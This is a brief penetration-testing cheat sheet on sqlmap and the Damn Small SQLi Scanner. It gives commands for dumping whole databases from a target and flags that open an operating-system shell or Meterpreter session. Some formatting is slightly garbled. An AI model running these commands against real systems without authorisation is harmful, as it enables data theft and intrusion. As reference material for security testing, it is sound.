1.1 KiB
1.1 KiB
SQLmap
Usage
- Use
-rwith a saved HTTP request
sqlmap -r request.txt --dbms=mysql --dump
sqlmap -r request.txt --batch
- Select form data automatically
sqlmap -u http://<target-IP>/site.php --forms --dump-all
| Parameter | Details |
|---|---|
| -r | Uses the intercepted request save as a file |
| --dbms | DBMS of target |
| --dump | Dump the entire database |
| --dump-all | Dump everything |
| -p | TESTPARAMETER |
| --os-shell | Prompt for an interactive operating system shell |
| --os-pwn | Prompt for an OOB shell, Meterpreter or VNC |
| --tables | Show tables |
| -T | Specify table |
Other Tools
Damn Small SQLi Scanner (DSSS)
python dsss.py -u "http://example.com/index.php?id="